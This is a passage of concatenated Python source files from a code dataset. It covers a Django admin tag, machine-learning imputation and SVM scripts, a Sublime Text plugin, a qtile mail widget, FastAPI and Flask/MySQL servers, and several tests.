urlresolvers\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef edit_link(object):\n content_type = ContentType.objects.get_for_model(object)\n admin_name = content_type.app_label + '_' + content_type.model + '_change'\n url = urlresolvers.reverse('admin:' + admin_name, args=(1, ))\n return url\n","sub_path":"apps/admin_edit_tag/templatetags/admin_edit_tag.py","file_name":"admin_edit_tag.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"382092815","text":"from sklearn import preprocessing\nimport pandas as pd\nfrom base_util import * \nfrom base_models import * \n\n\n############\n# Prueba EjemploSimpleReducción\ndevice='cpu'\npruebas='broma'\nrutaDataset=\"\"\n\n\nif pruebas=='broma':\n print(\"Dataset de broma\")\n print(\"----------------\")\n \n #Parametros generales del modelo\n tipoProblema='clasificacion' \n normalizaAtrib = True\n\n #Crea Dataset\n Xc=np.array([[1,2,3],[4,5,6],[7,8,9],[1,2,3],[4,5,6]])\n Xi=np.array([[1,np.NaN,3],[4,np.NaN,6],[7,8,9],[1,2,3],[4,5,6]])\n\n \n y=np.array([0.,1,2,0,2])\n\n df_Xi=pd.DataFrame(Xi,columns=[\"A1\",\"A2\",\"A3\"],index=[\"O1\",\"O2\",\"O3\",\"O4\",\"O5\"])\n df_Xc=pd.DataFrame(Xc,columns=[\"A1\",\"A2\",\"A3\"],index=[\"O1\",\"O2\",\"O3\",\"O4\",\"O5\"])\n df_y=pd.DataFrame(y)\n\n #Crea un tensor con las clases y el peso para cada una\n clases, repClases = np.unique(df_Xc.values,return_counts=True)\n pesosClases1 = torch.FloatTensor(repClases[~np.isnan(clases)].sum()/repClases[~np.isnan(clases)])\n pesosClases2 = torch.FloatTensor(max(repClases[~np.isnan(clases)])/repClases[~np.isnan(clases)])\n clases = torch.FloatTensor(clases[~np.isnan(clases)]).to(dtype=int)\n maxClases = clases.max().item()\n \n # Escalamos la informacion\n if normalizaAtrib:\n if tipoProblema=='regresion': \n df_Xi_s, df_Xc_s, scaler = escala(df_Xi,df_Xc, normalizaAtrib, scaler=None)\n else:\n scaler=None\n df_Xi_s = df_Xi/maxClases\n df_Xc_s = df_Xc/maxClases\n else:\n df_Xi_s = df_Xi\n df_Xc_s = df_Xc\n\n\n \n #Definimos los parametros del grafo y llamamos a la funcion que lo crea.\n muestras, dimEntNodo = df_Xi.shape\n\n #Creamos las distintas capas del modelo\n dimEntArco=1\n dimEmbArco = dimEmbNodo = 10\n modoArcos=1\n modelosCapas=['EGSAGE','EGSAGE','EGSAGE']\n dropout=0.\n selActivacion='relu'\n concat_states= False\n nodo_hidden_dims = [10]\n normalizarEmb = [True, True, True]\n fAggr = 'mean'\n\n modeloGNN = GNNStack(dimEntNodo, # Atributos de nodo = Dimension del embeding del nodo = Atrib. de cada observacion\n dimEntArco, # Atributos de arco = Dimension del embeding del arco = 1\n dimEmbNodo, # La dimension del embeding de nodo a la salida de red(ej: 64)\n dimEmbArco, # La dimension del embeding de arco a la salida de red(ej: 64)\n modoArcos, # Determina como se opera con los arcos (default=1)\n modelosCapas, # Tipo de layer. En nuestro caso EGSAGE (hay mas tipos disponibles)\n dropout, # Dropout de la MLP que actualiza el embedding de los nodos.\n selActivacion, # Funcion de activacion que usamos (ej: relu)\n concat_states, # T o F. Indica si se concatenan los embeddings de cada layer \n nodo_hidden_dims, # Capas ocultas de MLP que actualiza el embedding de los nodos.\n normalizarEmb, # Lista bool. indicando si en una capa se normaliza embedding o no.\n fAggr).to(device) # Funcion de agregación (mean, sum, max...))\n\n \n # Esta red neuronal asigna valores a los arcos\n # Es la capa de tarea de la red.\n input_dim = dimEmbNodo * 2\n if tipoProblema=='regresion':\n output_dim = 1\n else:\n output_dim = len(clases)\n impute_hiddens= nodo_hidden_dims\n impute_activation='relu'\n impute_model = MLPNet(input_dim, output_dim,\n hidden_layer_sizes=impute_hiddens,\n hidden_activation=impute_activation,\n dropout=dropout).to(device)\n\n \n # Entrenamos el modelo y probamos el entrenamiento por batches\n if tipoProblema == 'regresion':\n funcPerdida = F.mse_loss\n else:\n funcPerdida = nn.CrossEntropyLoss(weight=pesosClases2.to(device)) #F.cross_entropy\n trocea = 1\n epochs = 5000\n known = 0.7 #Probabilidad de conocer el valor del atributo del arco (rdrop=1-known)\n opt=None\n best_loss=None\n \n print(\"Comienza entrenamiento \",epochs,\" epochs\\n\")\n \n data = crea_datos(df_Xi_s, df_Xc_s, df_y, 0)\n modeloGNN,inpute_model,opt,best_loss = entrenaRed(data, modeloGNN, impute_model, epochs, known, device, opt, normalizaAtrib, tipoProblema, funcPerdida, clases, best_loss)\n \n print (\"Fin entrenamiento---------------------\\n\")\n \n ##################\n # Probamos modelo\n ##################\n \n data1 = crea_datos(df_Xi_s, df_Xc_s, df_y, 0)\n\n # Prueba 1. Reconstruye matriz con valores vistos en el entrenamiento.\n #######\n print(\"\\nPrueba1- Resuelve el modelo entrenado\")\n print(\"===============================================\")\n \n imputaNaN1 = imputaValores(data1, modeloGNN, impute_model, device, tipoProblema, clases, normalizaAtrib)\n \n\n print(\"Matriz original\")\n print(df_Xc)\n print(\"Matriz con valores perdidos\")\n print(df_Xi)\n\n df_Xr = reconstruyeMatrizIncompleta(data1.df_Xi, imputaNaN1)\n \n if normalizaAtrib and tipoProblema==\"regresion\":\n print(\"\\nReconstruido\")\n print(scaler.inverse_transform(df_Xr))\n else:\n print(\"\\nReconstruido\")\n print(df_Xr * maxClases)\n _ =testRed(data1.test_labels, imputaNaN1, tipoProblema)\n","sub_path":"tfm_0_EjemploSimple.py","file_name":"tfm_0_EjemploSimple.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194322159","text":"\"\"\"\n==========================\nPlotting Validation Curves\n==========================\n\nIn this plot you can see the training scores and validation scores of an SVM\nfor different values of the kernel parameter gamma. For very low values of\ngamma, you can see that both the training score and the validation score are\nlow. This is called underfitting. Medium values of gamma will result in high\nvalues for both scores, i.e. the classifier is performing fairly well. If gamma\nis too high, the classifier will overfit, which means that the training score\nis good but the validation score is poor.\n\"\"\"\nprint(__doc__)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.svm import SVC\nfrom sklearn.learning_curve import validation_curve\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cross_validation import StratifiedShuffleSplit\n\nimport os\n\ndef get_path(rel_path):\n script_dir = os.path.dirname(__file__) #absolute dir the script is in\n abs_file_path = os.path.join(script_dir, rel_path)\n \n return abs_file_path\n\n#digits = load_digits()\n#X, y = digits.data, digits.target\n\ntrain_df = pd.read_csv(get_path(\"../../../../credit/credit_train.csv\"))\ntest_df = pd.read_csv(get_path(\"../../../../credit/credit_test.csv\"))\n\n# convert the \"quality\" label column to numpy arrays\ntrain_Y = train_df.pop('DEFAULT').values\ntrain_X = train_df.values\ntest_Y = test_df.pop('DEFAULT').values\ntest_X = test_df.values\n\n# Standartize \nscaler = StandardScaler()\ntest_X = scaler.fit_transform(test_X)\ntrain_X = scaler.fit_transform(train_X)\n\ncv = StratifiedShuffleSplit(test_Y, n_iter=1, test_size=0.2, random_state=42)\nbest_C = 1;\n\nparam_range = np.logspace(-2, 0, 3)\ntrain_scores, test_scores = validation_curve(\n SVC(C=best_C), test_X, test_Y, param_name=\"gamma\", param_range=param_range,\n cv=cv, scoring=\"accuracy\", n_jobs=-1)\n \ntrain_scores_mean = np.mean(train_scores, axis=1)\ntrain_scores_std = np.std(train_scores, axis=1)\ntest_scores_mean = np.mean(test_scores, axis=1)\ntest_scores_std = np.std(test_scores, axis=1)\n\nplt.title(\"Model Complexity Curve. Wine. RBF Kernel\")\nplt.xlabel(\"$\\gamma$\")\nplt.ylabel(\"Score\")\nplt.ylim(0.0, 1.0)\nplt.semilogx(param_range, train_scores_mean, label=\"Training score\", color=\"r\")\nplt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.2, color=\"r\")\nplt.semilogx(param_range, test_scores_mean, label=\"Cross-validation score\",\n color=\"g\")\nplt.fill_between(param_range, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.2, color=\"g\")\nplt.legend(loc=\"best\")\nplt.show()\n","sub_path":"svm/rbf/credit/complexity_curve_credit_rbf.py","file_name":"complexity_curve_credit_rbf.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"285072148","text":"import sublime, sublime_plugin, User.sublime_util as su\n\nclass EncloseInQuotesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _enclose(\"quotes\", self.view, edit)\n\nclass InsertQuotesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _insert(\"quotes\", self.view, edit)\n\nclass EncloseInParenthesesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _enclose(\"parentheses\", self.view, edit)\n\nclass InsertParenthesesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _insert(\"parentheses\", self.view, edit)\n\ndef _enclose(_type, v, edit):\n if any(rg.empty() for rg in v.sel()):\n v.window().run_command(\"find_under_expand\")\n a = sublime.load_settings(\"Preferences.sublime-settings\").get(_type)\n for rg in v.sel():\n if rg.empty(): continue\n s = v.substr(rg)\n curr = s[0] + s[-1]\n ix = a.index(curr) if curr in a else None\n if ix == None:\n new_s = a[0][0] + s + a[0][1]\n elif ix == len(a) - 1:\n new_s = s[1:-1]\n else:\n new_s = a[ix + 1][0] + s[1:-1] + a[ix + 1][1]\n v.replace(edit, rg, new_s)\n\ndef _insert(_type, v, edit):\n a = sublime.load_settings(\"Preferences.sublime-settings\").get(_type)\n new_sel = []\n for rg in v.sel():\n if not rg.empty():\n new_sel.append(rg)\n continue\n curr = v.substr(sublime.Region(rg.a - 1, rg.a + 1))\n ix = a.index(curr) if curr in a else None\n if ix == None:\n v.replace(edit, sublime.Region(rg.a, rg.a), a[0])\n new_sel.append(sublime.Region(rg.a + 1, rg.a + 1))\n elif ix == len(a) - 1:\n v.replace(edit, sublime.Region(rg.a - 1, rg.a + 1), \"\")\n new_sel.append(sublime.Region(rg.a - 1, rg.a - 1))\n else:\n v.replace(edit, sublime.Region(rg.a - 1, rg.a + 1), a[ix + 1])\n new_sel.append(sublime.Region(rg.a, rg.a))\n v.set_selection(new_sel)\n","sub_path":"Packages/User/quotes_and_parentheses.py","file_name":"quotes_and_parentheses.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605807236","text":"# -*- coding: utf-8 -*-\n# vim: set sw=4 et tw=80:\n\nfrom . import base\n\nimport six\nimport os.path\nimport mailbox\n\n\nclass Maildir(base.ThreadedPollText):\n \"\"\"\n A simple widget showing the number of new mails in maildir mailboxes.\n \"\"\"\n\n defaults = [\n (\"maildirPath\", \"~/Mail\", \"path to the Maildir folder\"),\n (\"subFolders\", [], 'The subfolders to scan (e.g. [{\"path\": \"INBOX\", '\n '\"label\": \"Home mail\"}, {\"path\": \"spam\", \"label\": \"Home junk\"}]'),\n (\"separator\", \" \", \"the string to put between the subfolder strings.\"),\n ]\n\n def __init__(self, maildirPath=None, subFolders=None, separator=\" \", **config):\n base.ThreadedPollText.__init__(self, **config)\n self.add_defaults(Maildir.defaults)\n\n if maildirPath is not None:\n base.deprecated(\"maildirPath is deprecated\")\n self.maildirPath = maildirPath\n if subFolders is not None:\n base.deprecated(\"subFolders is deprecated\")\n self.subFolders = subFolders\n if separator != \" \":\n base.deprecated(\"separator is deprecated\")\n self.separator = separator\n\n # if it looks like a list of strings then we just convert them\n # and use the name as the label\n if isinstance(subFolders[0], six.string_types):\n self._subFolders = [\n {\"path\": folder, \"label\": folder}\n for folder in subFolders\n ]\n\n def poll(self):\n \"\"\"\n Scans the mailbox for new messages.\n\n @return: A string representing the current mailbox state.\n \"\"\"\n state = {}\n\n def to_maildir_fmt(paths):\n for path in iter(paths):\n yield path.rsplit(\":\")[0]\n\n for subFolder in self.subFolders:\n path = os.path.join(self.maildirPath, subFolder[\"path\"])\n maildir = mailbox.Maildir(path)\n state[subFolder[\"label\"]] = 0\n\n for file in to_maildir_fmt(os.listdir(os.path.join(path, \"new\"))):\n if file in maildir:\n state[subFolder[\"label\"]] += 1\n\n return self.format_text(state)\n\n def format_text(self, state):\n \"\"\"\n Converts the state of the subfolders to a string.\n\n @param state: a dictionary as returned by mailbox_state.\n @return: a string representation of the given state.\n \"\"\"\n return self.separator.join(\n \"{}: {}\".format(*item) for item in state.items()\n )\n","sub_path":"libqtile/widget/maildir.py","file_name":"maildir.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"445970225","text":"#!/usr/bin/env python3\nimport json\nimport datetime\n\nimport sys\n\nsys.path.append(\"data\")\nimport vars\n\nclass CourseData:\n def __init__(self):\n self._coursedata={}\n\n with open(\"data/courses.json\") as fp:\n data=json.loads(fp.read())\n\n\n for _semester in data['semesters']:\n if _semester['name'] == vars.CurrentSemester:\n self._coursedata=_semester\n return\n\n #if we got here, we have a problem.. json does not contain the given semester\n\n def getAllCourses(self):\n _list=[]\n for _d in self._coursedata['courses']:\n _list.append(_d['name'])\n\n return _list\n\n def getCurrentCourseAssignments(self, coursename):\n _assignments=[]\n for _d in self._coursedata['courses']:\n if _d['name'] == coursename:\n for _a in _d['assignments']:\n _begin=datetime.datetime.strptime(_a['BeginDate'], '%Y-%m-%d')\n _end=datetime.datetime.strptime(_a['DueDate'], '%Y-%m-%d')\n _now=datetime.datetime.now()\n if _begin < _now < _end:\n _assignments.append({'name': _a['name'], 'BeginDate':_a['BeginDate'], \n 'DueDate': _a['DueDate']})\n\n return _assignments\n\n\nif __name__ == '__main__':\n _cd=CourseData()\n print(_cd.getAllCourses())\n print(_cd.getCurrentCourseAssignments('CIS 150'))\n","sub_path":"CourseData.py","file_name":"CourseData.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497460683","text":"#! /usr/bin/env python3\n# -*- codong: utf-8 -*-\nimport logging\nfrom typing import Optional\n\nfrom fastapi import FastAPI, Request\nimport uvicorn\nfrom fastapi.exception_handlers import request_validation_exception_handler\nfrom pydantic import ValidationError\n\nfrom routers_dev.common import Slot\nfrom routers_dev import (\n routers_author, routers_db, routers_frags, routers_misc, routers_posneg,\n routers_publ, routers_top)\nfrom server_utils import _init_logging\nfrom utils import get_logger_dev as get_logger, load_config_dev as load_config\n\n\n_logger = get_logger()\n\n\ndef main():\n _init_logging()\n\n # app, conf = create_srv()\n # srv_run_args = conf['srv_run_args']\n # web.run_app(app, **srv_run_args)\n cummon_prefix = '/cirtec_dev'\n\n app = FastAPI(\n openapi_url=cummon_prefix + '/openapi.json',\n docs_url=cummon_prefix + '/docs',\n redoc_url=cummon_prefix + '/redoc',\n description='Сервер данных.'\n )\n\n conf = _load_conf()\n slot:Optional[Slot] = None\n\n # router.add_event_handler('startup', partial(Slot.init_slot, conf))\n # app.on_event('startup')(partial(Slot.init_slot, conf))\n @app.on_event('startup')\n async def _():\n nonlocal conf, slot\n slot = Slot.init_slot(conf)\n\n @app.on_event('shutdown')\n async def _close_app():\n nonlocal slot\n await slot.close()\n\n app.include_router(routers_db.router, prefix=cummon_prefix + '/db')\n app.include_router(routers_author.router, prefix=cummon_prefix + '/authors')\n app.include_router(routers_frags.router, prefix=cummon_prefix + '/frags')\n app.include_router(routers_posneg.router, prefix=cummon_prefix + '/pos_neg')\n app.include_router(routers_publ.router, prefix=cummon_prefix + '/publ')\n app.include_router(routers_top.router, prefix=cummon_prefix + '/top')\n app.include_router(routers_misc.router, prefix=cummon_prefix)\n\n @app.middleware(\"http\")\n async def db_session_middleware(request:Request, call_next):\n # request.state.slot = Slot.instance()\n Slot.set2request(request)\n response = await call_next(request)\n return response\n\n @app.exception_handler(ValidationError)\n async def ex_hdlr(request, exc):\n return await request_validation_exception_handler(request, exc)\n\n # asgi_app = SentryAsgiMiddleware(app)\n\n conf_app = conf['srv_run_args']\n uvicorn.run(\n app, host=conf_app.get('host') or '0.0.0.0',\n port=conf_app.get('port') or 8668,\n use_colors=True, log_config=None)\n\n\ndef _load_conf() -> dict:\n # env.read_envfile()\n conf = load_config()\n\n return conf\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"server_cirtec_devf.py","file_name":"server_cirtec_devf.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309257785","text":"import redis\nfrom dbSettings import REDIS_URL\nimport pymysql\nimport dbSettings\n\nclass detailTask():\n def __init__(self):\n self.db = dbSettings.db_connect()\n self.cursor = self.db.cursor()\n self.listTable = \"`houselist`\"\n self.redis = redis.Redis.from_url(REDIS_URL)\n print(REDIS_URL)\n\n\n def insertTask(self):\n sql = \"SELECT house_id FROM \" + self.listTable \n self.cursor.execute(sql)\n self.db.commit()\n\n results = self.cursor.fetchall()\n\n print(len(results))\n count = 0\n for row in results:\n count += 1\n self.redis.lpush(\"detail:start_urls\", row[\"house_id\"])\n if count % 10000 == 0:\n print(count)\n\n\n\nif __name__ == \"__main__\":\n task = detailTask()\n task.insertTask()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"airbnbSpider_scrapy/airbnbSpider_us_local/airbnbSpider/detail_task.py","file_name":"detail_task.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"77137087","text":"import os\n\n# uncomment to force CPU training\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n\nimport pandas as pd\nimport pdb\nimport sklearn\nimport sklearn.preprocessing\nimport numpy as np\nimport fancyimpute\n#import matplotlib.pyplot as plt\nimport heapq\nimport pickle\n\n# Fixed random seed\n# Even though we fixed the random seed, there are still some randomness in the results due to SGD based algorithms\nnp.random.seed(2019)\ndf1 = pd.read_csv('user_score.csv')\ndata = df1[['user_id', 'ifp_id']]\nenc = sklearn.preprocessing.OrdinalEncoder()\ndf2 = enc.fit_transform(data).astype(int)\n\nuser_ids = df2[:, 0]\nifp_ids = df2[:, 1]\nbrier_scores = df1['brier_score']\n\nX = np.zeros((max(user_ids)+1, max(ifp_ids)+1))\nn_rows, n_columns = X.shape\n\nfor index, row in enumerate(df2):\n\tX[row[0], row[1]] = brier_scores[index]\n\ndf = pd.DataFrame(X)\n\ndef calculate_mse_ary(X_filled, missing_mask):\n\tassert X_filled.shape == X.shape\n\treturn ((X_filled[missing_mask] - X[missing_mask]) ** 2).mean()\n\ndef run_imputation(drop_probablity):\n\t# using shuffle instead of generating random numbers as mask to ensure exact percentages of cells are masked\n\tn_total = int(np.prod(X.shape))\n\tn_drop = int(round(n_total * drop_probablity))\n\tn_keep = n_total - n_drop\n\t# True is drop, False is keep\n\tmissing_mask = np.asarray([True] * n_drop + [False] * n_keep)\n\tnp.random.shuffle(missing_mask)\n\tmissing_mask = missing_mask.reshape(X.shape)\n\n\t# The probablity of all cells in a row are masked is (drop_probablity)^n_columns. If drop_probablity is large, this could happen.\n\t# If that happens, some algorithm will report error, and it's not reasonable to expect missing values could be recoverd in this case.\n\t# So add this logic to ensure at least one unmasked cell per line, while still keep the total number of masked cell unchanged.\n\tdrop_count_heap = [(sum(row), index) for index, row in enumerate(missing_mask)]\n\theapq.heapify(drop_count_heap)\n\n\tfor row in missing_mask:\n\t\tif sum(row) == n_columns:\n\t\t\tkeep_index = np.random.randint(0, n_columns)\n\t\t\trow[keep_index] = False\n\n\t\t\tmost_keep_row_index = heapq.heappop(drop_count_heap)\n\t\t\tmost_keep_row = missing_mask[most_keep_row_index[1]]\n\t\t\tdrop_index = np.random.choice(np.where(most_keep_row==False)[0])\n\t\t\tmost_keep_row[drop_index] = True\n\t\t\theapq.heappush(drop_count_heap, (sum(most_keep_row), most_keep_row_index[1]))\n\n\t# verify the total number of masked cell unchanged\n\tassert np.sum(missing_mask) == n_drop\n\n\tX_incomplete = df.mask(missing_mask)\n\t#X_incomplete.to_csv('incomplete_{}.csv'.format(drop_probablity), index=False)\n\tX_incomplete = X_incomplete.values\n\n\tX_filled_simple = fancyimpute.SimpleFill().fit_transform(X_incomplete)\n\tsimple_mse = calculate_mse_ary(X_filled_simple, missing_mask)\n\n\tX_filled_knn1 = fancyimpute.KNN(k=1).fit_transform(X_incomplete)\n\tknn_mse1 = calculate_mse_ary(X_filled_knn1, missing_mask)\n\n\tX_filled_knn3 = fancyimpute.KNN(k=3).fit_transform(X_incomplete)\n\tknn_mse3 = calculate_mse_ary(X_filled_knn3, missing_mask)\n\n\tX_filled_knn10 = fancyimpute.KNN(k=10).fit_transform(X_incomplete)\n\tknn_mse10 = calculate_mse_ary(X_filled_knn10, missing_mask)\n\n\tX_filled_knn15 = fancyimpute.KNN(k=15).fit_transform(X_incomplete)\n\tknn_mse15 = calculate_mse_ary(X_filled_knn15, missing_mask)\n\n\tX_incomplete_normalized = fancyimpute.BiScaler().fit_transform(X_incomplete)\n\tX_filled_softimpute = fancyimpute.SoftImpute().fit_transform(X_incomplete_normalized)\n\tsoftImpute_mse = calculate_mse_ary(X_filled_softimpute, missing_mask)\n\n\tX_filled_iter = fancyimpute.IterativeImputer().fit_transform(X_incomplete)\n\titer_mse = calculate_mse_ary(X_filled_iter, missing_mask)\n\n\tX_filled_svd = fancyimpute.IterativeSVD().fit_transform(X_incomplete)\n\tsvd_mse = calculate_mse_ary(X_filled_svd, missing_mask)\n\n\tX_filled_mf = fancyimpute.MatrixFactorization().fit_transform(X_incomplete)\n\tmf_mse = calculate_mse_ary(X_filled_mf, missing_mask)\n\n\t# It's too slow for large matrix, comment out\n\t#X_filled_nnm = fancyimpute.NuclearNormMinimization().fit_transform(X_incomplete)\n\t#nnm_mse = ((X_filled_nnm[missing_mask] - X[missing_mask]) ** 2).mean()\n\n\tdf_mse = pd.DataFrame([\n\t\t['SimpleFill', simple_mse],\n\t\t['KNN1', knn_mse1],\n\t\t['KNN3', knn_mse3],\n\t\t['KNN10', knn_mse10],\n\t\t['KNN15', knn_mse15],\n\t\t['SoftImpute', softImpute_mse],\n\t\t['IterativeImputer', iter_mse],\n\t\t['IterativeSVD', svd_mse],\n\t\t['MatrixFactorization', mf_mse]\n\t], columns=['method', 'mse'])\n\n\treturn df_mse\n\n#df_mse_80 = run_imputation(0.01)\n#df_mse_80.to_csv('stat_user_ifp_brier.csv', index=False)\n#pdb.set_trace()\n#print('Before plot')\n\nplot_X = []\nplot_Y = []\nfor index, drop_probablity in enumerate(np.linspace(0.01, 0.85, 50)):\n\tprint(index, drop_probablity)\n\tdf_mse = run_imputation(drop_probablity)\n\tplot_X.append(drop_probablity)\n\tplot_Y.append(df_mse['mse'])\n\nplot_Y = np.asarray(plot_Y)\n\nwith open('data/{}_{}.pickle'.format(save_prefix, run_name), 'wb') as fout:\n\tpickle.dump(plot_Y, fout, pickle.HIGHEST_PROTOCOL)\n\nprint('Done')\n'''\nplt.plot(plot_X, plot_Y[:, 0], label='SimpleFill')\nplt.plot(plot_X, plot_Y[:, 1], label='KNN1')\nplt.plot(plot_X, plot_Y[:, 2], label='KNN3')\nplt.plot(plot_X, plot_Y[:, 3], label='KNN10')\nplt.plot(plot_X, plot_Y[:, 4], label='KNN15')\nplt.plot(plot_X, plot_Y[:, 5], label='SoftImpute')\nplt.plot(plot_X, plot_Y[:, 6], label='IterativeImputer')\n#plt.plot(plot_X, plot_Y[:, 7], label='IterativeSVD')\nplt.plot(plot_X, plot_Y[:, 8], label='MatrixFactorization')\nplt.xlabel('Drop Probablity')\nplt.ylabel('MSE of Brier score')\nplt.legend()\nplt.show()\nwith open('user_ifp_brier.pickle', 'wb') as fout:\n\tpickle.dump([plot_X, plot_Y], fout, pickle.HIGHEST_PROTOCOL)\n\npdb.set_trace()\nprint('Pause before exit')\n'''\n","sub_path":"user_ifp_brier.py","file_name":"user_ifp_brier.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415989313","text":"import sys\n\nfrom mock import patch, ANY\nfrom erroremail import ErrorEmail\n\n\nclass TestSend(object):\n\n def setup(self):\n self.config = {\n 'SERVER': 'MYHOST',\n 'TO': ['my@email.com'],\n 'FROM': 'your@email.com',\n 'SUBJECT': 'ERR: {host}:{port} {message}',\n }\n self.err = ErrorEmail(self.config, host='x1', port=9999)\n\n @patch('erroremail.smtplib.SMTP')\n def test_send(self, SMTP):\n try:\n with self.err:\n raise Exception('Whoa')\n except:\n pass\n\n server = SMTP()\n server.sendmail.assert_called_with(\n self.config['TO'],\n self.config['FROM'],\n ANY\n )\n\n def test_get_subject(self):\n try:\n tuple()[0]\n except:\n subject = self.err.get_subject(sys.exc_info())\n assert subject == 'ERR: x1:9999 IndexError: tuple index out of range'\n\n def test_create_message(self):\n try:\n tuple()[0]\n except:\n info = sys.exc_info()\n\n message = self.err.create_message_from_traceback(info)\n subject = self.err.get_subject(info)\n\n assert message['Content-Type'] == 'multipart/alternative'\n assert message['Subject'] == subject\n assert message['To'] == 'my@email.com'\n assert message['From'] == 'your@email.com'\n","sub_path":"tests/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"387153949","text":"# from flask import Flask, render_template\nfrom app import app\nfrom flask import request, jsonify\nimport pymysql\nimport json\n\n\n\nclass Database:\n def __init__(self):\n host = \"localhost\"\n user = \"root\"\n password = \"admin1234\"\n db = \"usmstd\"\n\n self.connectionObj = pymysql.connect(host=host, user=user, password=password, db=db, cursorclass=pymysql.cursors.DictCursor)\n self.cursorObj = self.connectionObj.cursor()\n\n def get_data(self):\n sql_query = \"SELECT collect_date, tof_s1, tof_s2, tof_s3, tof_s4, temp_s1, temp_s2, temp_s3, temp_s4, \" \\\n \"tc1, tc2, tc3, tc4, tc5, tc6 FROM experimental_data\"\n self.cursorObj.execute(sql_query)\n result = list(self.cursorObj.fetchall())\n\n # Converts all decimal values in the dictionary to a string\n result_stringified = [dict([key, str(value)] for key, value in dicts.items()) for dicts in result]\n\n return result_stringified\n\n def insert_data(self, json_data):\n # print(json_data)\n collect_date = json_data[\"collect_date\"]\n tof_s1 = json_data[\"tof_s1\"]\n tof_s2 = json_data[\"tof_s2\"]\n tof_s3 = json_data[\"tof_s3\"]\n tof_s4 = json_data[\"tof_s4\"]\n temp_s1 = json_data[\"temp_s1\"]\n temp_s2 = json_data[\"temp_s2\"]\n temp_s3 = json_data[\"temp_s3\"]\n temp_s4 = json_data[\"temp_s4\"]\n tc1 = json_data[\"tc1\"]\n tc2 = json_data[\"tc2\"]\n tc3 = json_data[\"tc3\"]\n tc4 = json_data[\"tc4\"]\n tc5 = json_data[\"tc5\"]\n tc6 = json_data[\"tc6\"]\n\n sql_query = \"INSERT INTO experimental_data() VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n data = (collect_date, tof_s1, tof_s2, tof_s3, tof_s4, temp_s1, temp_s2, temp_s3, temp_s4, tc1, tc2,\n tc3, tc4, tc5, tc6)\n\n self.cursorObj.execute(sql_query, data)\n self.connectionObj.commit()\n resp = jsonify('Data added successfully!!!')\n\n return resp\n\n\n# Class place holder for ORM implementation\n# class dataVals:\n# def __init__(self, firstname, lastname, gender):\n# self.firstname = firstname\n# self.lastname = lastname\n# self.gender = gender\n\n\n\n@app.route('/')\n@app.route('/get_data')\ndef get_db_data():\n db = Database()\n fetched_data = db.get_data()\n print(fetched_data)\n\n # converts to JSON\n fetched_data_json = json.dumps(fetched_data)\n\n return fetched_data_json\n\n\n@app.route('/add', methods=['POST'])\ndef add_data_to_db():\n _json = request.json\n db = Database()\n ret_msg = db.insert_data(_json)\n return ret_msg\n\n\n\n","sub_path":"db_rest_app/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"358081292","text":"import pytest\nfrom torch import nn\n\nfrom nncf.utils import training_mode_switcher\nfrom nncf.initialization import DataLoaderBNAdaptationRunner\n\nfrom tests.helpers import BasicConvTestModel, TwoConvTestModel, MockModel\nfrom tests.quantization.test_saturation_issue_export import DepthWiseConvTestModel, EightConvTestModel\n# pylint:disable=unused-import\nfrom tests.modules.test_rnn import _seed\n\n\ndef save_model_training_state(module, model_state):\n for ch in module.children():\n model_state[ch] = ch.training\n save_model_training_state(ch, model_state)\n\n\ndef compare_saved_model_state_and_current_model_state(module, model_state):\n for ch in module.children():\n assert model_state[ch] == ch.training\n compare_saved_model_state_and_current_model_state(ch, model_state)\n\n\ndef randomly_change_model_training_state(module):\n import random\n for ch in module.children():\n if random.uniform(0, 1) > 0.5:\n ch.training = False\n else:\n ch.training = True\n randomly_change_model_training_state(ch)\n\n\n@pytest.mark.parametrize('model', [BasicConvTestModel(), TwoConvTestModel(), MockModel(),\n DepthWiseConvTestModel(), EightConvTestModel()])\ndef test_training_mode_switcher(_seed, model):\n randomly_change_model_training_state(model)\n\n saved_model_state = {}\n save_model_training_state(model, saved_model_state)\n\n with training_mode_switcher(model, True):\n # pylint: disable=unnecessary-pass\n 